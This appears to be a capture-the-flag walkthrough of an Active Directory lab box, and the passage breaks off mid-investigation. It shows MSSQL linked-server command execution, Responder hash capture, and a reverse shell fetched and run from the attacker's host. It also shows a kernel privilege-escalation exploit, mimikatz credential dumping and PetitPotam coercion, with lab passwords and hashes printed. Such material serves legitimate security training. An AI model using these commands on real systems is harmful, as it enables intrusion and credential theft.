DarkZero
10.129.3.164
john.w:RFulUtONCOL!
Recon
nmap -vv -sVC -p- -oN nmap-initial 10.129.183.50
# Nmap scan report for 10.129.183.50
# Host is up, received echo-reply ttl 127 (0.031s latency).
# Scanned at 2025-10-05 15:13:34 CEST for 339s
# Not shown: 65512 filtered tcp ports (no-response)
# PORT STATE SERVICE REASON VERSION
# 53/tcp open domain syn-ack ttl 127 Simple DNS Plus
# 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-05 20:17:32Z)
# 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
# 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after: 2026-07-29T11:40:00
# | MD5: ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# 445/tcp open microsoft-ds? syn-ack ttl 127
# 464/tcp open kpasswd5? syn-ack ttl 127
# 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
# 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# |_ssl-date: TLS randomness does not represent time
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after: 2026-07-29T11:40:00
# | MD5: ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# 1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RC0+
# |_ssl-date: 2025-10-05T20:19:08+00:00; +6h59m55s from scanner time.
# | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
# | Issuer: commonName=SSL_Self_Signed_Fallback
# | Public Key type: rsa
# | Public Key bits: 3072
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-10-05T19:18:46
# | Not valid after: 2055-10-05T19:18:46
# | MD5: 636dcdadfc6088faeca100461f09d2da
# | SHA-1: 78df4b0d7e1cbbe401e6c390f419df8595056b6f
# | -----BEGIN CERTIFICATE-----
# | MIIEADCCAmigAwIBAgIQG9v4ecVQHatCHpmsth/72TANBgkqhkiG9w0BAQsFADA7
# | MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
# | bABsAGIAYQBjAGswIBcNMjUxMDA1MTkxODQ2WhgPMjA1NTEwMDUxOTE4NDZaMDsx
# | OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
# | AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBALluoV1L
# | LYJAOaHgSu9QgVaYyO5L/g787BKZTxrGMBtVqZ6w7UloGzGNjaf0MOmbNuFNPLY1
# | QbUll22daQnuhazWmyCa0CCCtzEZhYUEspu22HDmWiwzsGrqV+Rw27GthMXS2C90
# | 9VjmLX9VWEZ2MVlC7e1hXY3CyICfUeyU3LJZhgZLvnnYVogtbsSyDJM+q3lMYnX/
# | dBByupnKDHkVwy6T7vKlc/1Vt3SXDQ7l01so2I69BjwsB26jvwCWYxXVDiyLGtiJ
# | xnJ+3PwsJt2dZmnF2Zuk3Wch1lX1EptxBpzAZ5o0+FrzXGL8mjytsVBkORWBotCm
# | axInG5WLVOyV2TBY/oLLvN0fV0OAdoWzCmelDM3yoM58MN0jkarN6Mc6actPxSD4
# | aZ1foVy87h4CMmheLit9yJVie5u/aoU5xE4tDO1BY9gywgMZ0ig7cCQ9jsvVWmeW
# | +IoAZbMaqMANGjHqYfKuBpSjNVPdRMd9Rn1dGIs2uv6zfzsHsXcx6wuy1QIDAQAB
# | MA0GCSqGSIb3DQEBCwUAA4IBgQCzCfanQ7JNqH2xP+14XVDhzJiTZZKV/gRdbrNk
# | IiCMHCOpq8NZ7I66ZZpVRwQfw23sNpJ84nEt5enNi5krgwyEDCgT2FFbckonIo9o
# | UqhCRmqZhqJIbG9Qm2QjHfdF7gYRLt/Asv0KFyAzuMkszwp/W75fxJlvD6QRTyFM
# | KQTmN/rIO1kQwQ9nSemR4/1rZUkf4QEVF+aMByhrj2+6QCZC1ND128Mk/8i34wV9
# | iM9iEjBry1klSinsePGtBcA4i+X5LbMHXLUP1dtSYQtO4IssvXA1RCW99ZtKYxTi
# | ZpcQm6cxdMDWosBA4p20sNyOC9LWSFBPogUslSj9YGVDpksS0/bD1LJFQIOjfk4D
# | Zoj+HS1I+qsP2PoLldW51LbHGCxQnxprY3fWvzRrlkfMRe4kPjTvKGmwKm+uw5fl
# | Q04dwqzczCA5PYqJ8KTuP5y2eab178IrYoHMcxr84iZMf+So6HZf1gR5T84Y2SpY
# | naBEAhwf2GK7QI4+P/0jvvCbf9k=
# |_-----END CERTIFICATE-----
# |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
# |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
# 2179/tcp open vmrdp? syn-ack ttl 127
# 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after: 2026-07-29T11:40:00
# | MD5: ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# |_ssl-date: TLS randomness does not represent time
# 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after: 2026-07-29T11:40:00
# | MD5: ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# |_ssl-date: TLS randomness does not represent time
# 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-server-header: Microsoft-HTTPAPI/2.0
# |_http-title: Not Found
# 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
# 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 49671/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
# 49891/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 49908/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 55968/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# 60342/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
# Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
#
# Host script results:
# |_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m54s
# | p2p-conficker:
# | Checking for Conficker.C or higher...
# | Check 1 (port 47592/tcp): CLEAN (Timeout)
# | Check 2 (port 44145/tcp): CLEAN (Timeout)
# | Check 3 (port 4598/udp): CLEAN (Timeout)
# | Check 4 (port 25274/udp): CLEAN (Timeout)
# |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
# | smb2-time:
# | date: 2025-10-05T20:18:29
# |_ start_date: N/A
# | smb2-security-mode:
# | 311:
# |_ Message signing enabled and required
#
# Read data files from: /usr/bin/../share/nmap
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 5 15:19:13 2025 -- 1 IP address (1 host up) scanned in 339.24 seconds
User
Enumerating services
Looking at the ports, there are some interesting configurations.
Let's look trough the different services with netexec:
nxc smb "$IP" -u $USER -p $PASSWORD --shares
# SMB 10.129.183.50 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
# SMB 10.129.183.50 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
# SMB 10.129.183.50 445 DC01 [*] Enumerated shares
# SMB 10.129.183.50 445 DC01 Share Permissions Remark
# SMB 10.129.183.50 445 DC01 ----- ----------- ------
# SMB 10.129.183.50 445 DC01 ADMIN$ Remote Admin
# SMB 10.129.183.50 445 DC01 C$ Default share
# SMB 10.129.183.50 445 DC01 IPC$ READ Remote IPC
# SMB 10.129.183.50 445 DC01 NETLOGON READ Logon server share
# SMB 10.129.183.50 445 DC01 SYSVOL READ Logon server share
nxc ldap "$IP" -u $USER -p $PASSWORD
# LDAP 10.129.183.50 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
# LDAPS 10.129.183.50 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
Let's run bloodhound, for the collector I'm going to use rusthound, first time trying it, for some reason nxc ldap's bloodhound feature doesn't resolve, for some weird DNS reason it's trying to resolve the internal IP of DC01:
rusthound -d "DARKZERO.HTB" -u "john.w@DARKZERO.HTB" -p 'RFulUtONCOL!' --zip --ldaps --adcs
# ---------------------------------------------------
# Initializing RustHound at 16:30:56 on 02/14/26
# Powered by g0h4n from OpenCyber
# ---------------------------------------------------
#
# [2026-02-14T15:30:56Z INFO rusthound] Verbosity level: Info
# [2026-02-14T15:30:56Z INFO rusthound::ldap] Connected to DARKZERO.HTB Active Directory!
# [2026-02-14T15:30:56Z INFO rusthound::ldap] Starting data collection...
# [2026-02-14T15:30:57Z INFO rusthound::ldap] All data collected for NamingContext DC=DARKZERO,DC=HTB
# [2026-02-14T15:30:57Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=DARKZERO,DC=HTB
# [2026-02-14T15:30:57Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
# [2026-02-14T15:30:57Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
# ⢀ Parsing LDAP objects: 29% [2026-02-14T15:30:57Z INFO rusthound::modules::adcs::parser] Found 11 enabled certificate templates
# [2026-02-14T15:30:57Z INFO rusthound::json::parser] Parsing LDAP objects finished!
# [2026-02-14T15:30:57Z INFO rusthound::json::checker] Starting checker to replace some values...
# [2026-02-14T15:30:57Z INFO rusthound::json::checker] Checking and replacing some values finished!
# [2026-02-14T15:30:57Z INFO rusthound::modules] Starting checker for ADCS values...
# [2026-02-14T15:33:12Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://DC01.darkzero.htb/certsrv/, please try manually and check for https access if EPA is enable.
# [2026-02-14T15:33:12Z INFO rusthound::modules] Checking for ADCS values finished!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 6 users parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 64 groups parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 1 computers parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 1 ous parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 1 domains parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 2 gpos parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 21 containers parsed!
# [2026-02-14T15:33:12Z INFO rusthound::json::maker] 1 cas parsed!
# [2026-02-14T15:33:13Z INFO rusthound::json::maker] 33 templates parsed!
# [2026-02-14T15:33:13Z INFO rusthound::json::maker] .//20260214163312_darkzero-htb_rusthound.zip created!
#
# RustHound Enumeration Completed at 16:33:13 on 02/14/26! Happy Graphing!
I looked a lot trough ACLs but nothing stands out, though we can note that our Domain Users can enroll into the darkzero-DC01-CA.
Maybe a misconfiguration with the CA for later. Looking at other services, we have MSSQL.
Gaining RCE on a linked server in MSSQL
nxc mssql "$IP" -u $USER -p $PASSWORD
# MSSQL 10.129.77.157 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
# MSSQL 10.129.77.157 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
mssqlclient.py -windows-auth 'DARKZERO.HTB/john.w:RFulUtONCOL!@10.129.77.157'
Not enough privileges for xp_cmdshell, but we have a linked server where we are sysadmin:
SELECT srvname, isremote FROM sysservers
-- srvname isremote
-- ----------------- --------
-- DC01 1
--
-- DC02.darkzero.ext 0
--
EXEC('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [DC02.darkzero.ext]
--
-- - - - -
-- 1 1 1 1
Let's use this to enable xp_cmdshell and execute a command to check if it works:
exec('exec sp_configure ''show advanced options'', 1; reconfigure;') at [dc02.darkzero.ext]
exec('exec sp_configure ''xp_cmdshell'', 1; reconfigure;') at [dc02.darkzero.ext]
exec('xp_cmdshell ''whoami''') at [dc02.darkzero.ext]
-- --------------------
-- darkzero-ext\svc_sql
Amazing, let's try to steal the user's hash, start responder:
responder -I "tun0"
# SMB server [ON]
# Responder IP [10.10.14.188]
Then let's use xp_dirtree to attempt to interact with our SMB server using responder:
EXEC ('xp_dirtree ''\\10.10.14.188\share''') AT [DC02.darkzero.ext]
responder -I tun0
# [SMB] NTLMv2-SSP Client : 10.129.77.157
# [SMB] NTLMv2-SSP Username : darkzero-ext\svc_sql
# [SMB] NTLMv2-SSP Hash : svc_sql::darkzero-ext:1122334455667788:C1D9B0DFFF5F69EA02DF9BC934FFBE29:010100000000000080A92D61E736DC017521457798EB4FDC000000000200080048004F005700540001001E00570049004E002D0031005700450050004D00440037004F005A003800520004003400570049004E002D0031005700450050004D00440037004F005A00380052002E0048004F00570054002E004C004F00430041004C000300140048004F00570054002E004C004F00430041004C000500140048004F00570054002E004C004F00430041004C000700080080A92D61E736DC01060004000200000008003000300000000000000000000000003000003B11E7FE2F532704CC269A9BE685EC612C034E1755F01052C17CFCD1230592960A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100380038000000000000000000
I tried to crack it with hashcat (mode 5600) but no luck, let's get a shell then.
I first tried common revshell payloads, but because are using: EXEC (...) AT [...], it cant do longer commands than 128 characters. Instead our best option is uploading payloads and executing them, there's a lot of options, though let's just go for meterpreter.
Though before that let's setup ligolo-ng to gain access to the internal network of this new machine, maybe we can WinRM or RDP or something more stable:
ligolo-ng -selfcert # Listens on :11601
Send agent.exe to the box and run it:
EXEC ('xp_cmdshell ''powershell -c "Invoke-WebRequest -Uri http://10.10.14.207/agent.exe -OutFile C:\Users\svc_sql\Desktop\agent.exe"''') AT [DC02.darkzero.ext]
EXEC ('xp_cmdshell ''powershell -c "C:\Users\svc_sql\Desktop\agent.exe -connect 10.10.14.207:11601 -ignore-cert"''') AT [DC02.darkzero.ext]
This worked, let's look at this new machine.
Exploring DC02@DARKZERO.EXT
nmap -sVC -Pn -p- 172.16.20.2
# Starting Nmap 7.93 ( https://nmap.org ) at 2025-10-07 16:48 CEST
# Nmap scan report for DARKZERO.EXT (172.16.20.2)
# Host is up (0.045s latency).
# Not shown: 65509 filtered tcp ports (no-response)
# PORT STATE SERVICE VERSION
# 53/tcp open domain Simple DNS Plus
# 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-07 21:53:30Z)
# 135/tcp open msrpc Microsoft Windows RPC
# 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
# 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after: 2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 445/tcp open microsoft-ds?
# 464/tcp open kpasswd5?
# 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
# 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after: 2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
# |_ssl-date: 2025-10-07T21:55:07+00:00; +6h59m57s from scanner time.
# |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
# |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
# | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
# | Not valid before: 2025-10-07T14:48:48
# |_Not valid after: 2055-10-07T14:48:48
# 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after: 2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after: 2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-server-header: Microsoft-HTTPAPI/2.0
# |_http-title: Not Found
# 9389/tcp open mc-nmf .NET Message Framing
# 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-server-header: Microsoft-HTTPAPI/2.0
# |_http-title: Not Found
# 49664/tcp open msrpc Microsoft Windows RPC
# 49665/tcp open msrpc Microsoft Windows RPC
# 49666/tcp open msrpc Microsoft Windows RPC
# 49667/tcp open msrpc Microsoft Windows RPC
# 49668/tcp open msrpc Microsoft Windows RPC
# 65181/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
# 65192/tcp open msrpc Microsoft Windows RPC
# 65197/tcp open msrpc Microsoft Windows RPC
# 65202/tcp open msrpc Microsoft Windows RPC
# 65231/tcp open msrpc Microsoft Windows RPC
# 65256/tcp open msrpc Microsoft Windows RPC
# Service Info: Host: DC02; OS: Windows; CPE: cpe:/o:microsoft:windows
#
# Host script results:
# | smb2-security-mode:
# | 311:
# |_ Message signing enabled and required
# |_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m55s
# | smb2-time:
# | date: 2025-10-07T21:54:26
# |_ start_date: N/A
# |_nbstat: NetBIOS name: DC02, NetBIOS user: <unknown>, NetBIOS MAC: 00155df25c01 (Microsoft)
Again this is also a classic domain controller, nothing unusual. We are now in a new domain DARKZERO.EXT. I couldn't find anything of use trough services, so let's get a meterpreter shell going.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.207 LPORT=4444 -f exe > shell.exe
python3 -m http.server 80
# In another shell start the listener
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 4444
run
Then let's upload it:
EXEC ('xp_cmdshell ''powershell -c "Invoke-WebRequest -Uri http://10.10.14.207/shell.exe -OutFile C:\Users\svc_sql\Desktop\shell.exe"''') AT [DC02.darkzero.ext]
EXEC ('xp_cmdshell ''powershell -c "C:\Users\svc_sql\Desktop\shell.exe"''') AT [DC02.darkzero.ext]
And we receive a connection, let's scan it:
# [*] Started reverse TCP handler on 0.0.0.0:4444
# [*] Sending stage (203846 bytes) to 10.129.3.65
# [*] Meterpreter session 1 opened (10.10.14.207:4444 -> 10.129.3.65:63598) at 2026-02-14 15:51:00 +0100
# meterpreter >
I explored the host for a bit, and then decided to profit from the fact we are using meterpreter to run the multi/recon/local_exploit_suggester, it's pretty noisy but it quickly enumerates a bunch of explots and finds possible vulnerabilities without too much effort:
# Background session 1? [y/N]
use multi/recon/local_exploit_suggester
set SESSION 1
run
# [*] 172.16.20.2 - Collecting local exploits for x64/windows...
# [*] 172.16.20.2 - 203 exploit checks are being tried...
# [+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
# [+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
# [+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
# [+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
# [+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
# [+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
# [+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
# [+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
# [*] Running check method for exploit 48 / 48
# [*] 172.16.20.2 - Valid modules for session 6:
# ============================
#
# # Name Potentially Vulnerable? Check Result
# - ---- ----------------------- ------------
# 1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
# 2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
# 3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
# 4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
# 5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
# 6 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
# 7 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
# 8 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
We have a bunch of hits, let's ignore the ones that are "not validated", after testing a couple of the others, I found that CVE-2024-30088 seems to work:
use exploit/windows/local/cve_2024_30088_authz_basep
info
# Name: Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes
# Provided by:
# tykawaii98
# jheysel-r7
# Description:
# CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,
# Windows 11 and Windows Server 2022.
#
# The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when
# the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the
# kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure
# directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and
# `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading
# to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.
#
# References:
# https://github.com/tykawaii98/CVE-2024-30088
# https://nvd.nist.gov/vuln/detail/CVE-2024-30038
set SESSION 4
set LHOST 10.10.14.188
run
# [*] Started reverse TCP handler on 10.10.14.188:4444
# [*] Running automatic check ("set AutoCheck false" to disable)
# [+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
# [*] Reflectively injecting the DLL into 2992...
# [+] The exploit was successful, reading SYSTEM token from memory...
# [+] Successfully stole winlogon handle: 824
# [+] Successfully retrieved winlogon pid: 592
# [*] Sending stage (203846 bytes) to 10.129.67.213
# [*] Meterpreter session 5 opened (10.10.14.188:4444 -> 10.129.67.213:51908) at 2025-10-07 20:58:11 +0200
meterpreter > getuid
# Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
# DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
# darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::
Amazing! Let's get the user.txt flag:
cd C:\Users\Administrator\Desktop
type user.txt
# <redacted>
Root
I tried to crack the hashes though no luck, let's focus on the inter-forest relationship between DARKZERO.HTB and DARKZERO.EXT. First let's just confirm our Admin access to DC02:
nxc winrm "172.16.20.2" -u "Administrator" -H "6963aad8ba1150192f3ca6341355eb49"
# WINRM 172.16.20.2 5985 DC02 [*] Windows Server 2022 Build 20348 (name:DC02) (domain:darkzero.ext)
# WINRM 172.16.20.2 5985 DC02 [+] darkzero.ext\Administrator:6963aad8ba1150192f3ca6341355eb49 (admin)
Ok, let's try to run a bloodhound scan, I'm not using rusthound this time since it doesn't support NT hashes, instad nxc ldap works this time:
faketime "$(rdate -n 172.16.20.2 -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
nxc ldap "172.16.20.2" -u "Administrator" -H "6963aad8ba1150192f3ca6341355eb49" --bloodhound -c All --dns-server 172.16.20.2
# LDAP 172.16.20.2 389 DC02 [*] Windows Server 2022 Build 20348 (name:DC02) (domain:darkzero.ext) (signing:None) (channel binding:Never)
# LDAP 172.16.20.2 389 DC02 [+] darkzero.ext\Administrator:6963aad8ba1150192f3ca6341355eb49 (admin)
# LDAP 172.16.20.2 389 DC02 Resolved collection methods: session, group, dcom, rdp, objectprops, trusts, acl, container, localadmin, psremote
# LDAP 172.16.20.2 389 DC02 Done in 0M 8S
# LDAP 172.16.20.2 389 DC02 Compressing output into /root/.nxc/logs/DC02_172.16.20.2_2026-02-14_161218_bloodhound.zip
Ok let's get more details about this relationship, we upload PowerView and check the trusts:
Import-Module .\PowerView.ps1
Get-DomainTrust
# SourceName : darkzero.ext
# TargetName : darkzero.htb
# TrustType : WINDOWS_ACTIVE_DIRECTORY
# TrustAttributes : FOREST_TRANSITIVE
# TrustDirection : Bidirectional
# WhenCreated : 7/29/2025 3:30:19 PM
# WhenChanged : 2/14/2026 12:30:11 PM
One interesting thing is that Administrator@DARKZERO.EXT is a member of "Group Policy Creator Owners", hinting towards potential GPO abuse, though only being able to create without linking is useless.
I explored this GPO abuse idea a bit more but it seems there's no interesting pre-existing GPOs, and no user that can link.
I enumerated a bit more of the users from both domains, there doesn't seem to be any interesting trust or users that we could abuse to pivot forests.
Looking for other attack vectors, I tried the classic programs:
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "lsadump::secrets" "exit"
#
# .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
# .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
# ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
# ## \ / ## > https://blog.gentilkiwi.com/mimikatz
# '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
# '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
#
# mimikatz(commandline) # privilege::debug
# Privilege '20' OK
#
# <SNIP>
#
# Secret : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : darkzero-ext\svc_sql
# cur/text: enTRanDiVec!
#
# Secret : _SC_SQLTELEMETRY / service 'SQLTELEMETRY' with username : NT Service\SQLTELEMETRY
#
# mimikatz(commandline) # exit
We got the credentials for svc_sql:enTRanDiVec!, ok.
Since we are NT AUTHORITY\SYSTEM, and this is a multi-machine AD, I started looking for any traffic on the network, I first used Inveigh since I'm more used to it. I suspect we might be able to do coercion, though I struggled to get anything to appear in Inveigh. It seems that I might be able to coerce DC01$ into connecting to DC02, I tried using PetitPotam, I was getting logs in Inveigh, proving that my technique is working, but for some reason there were no TGTs appearing. I then looked for alternatives, I saw that Rubeus can do TGT monitoring:
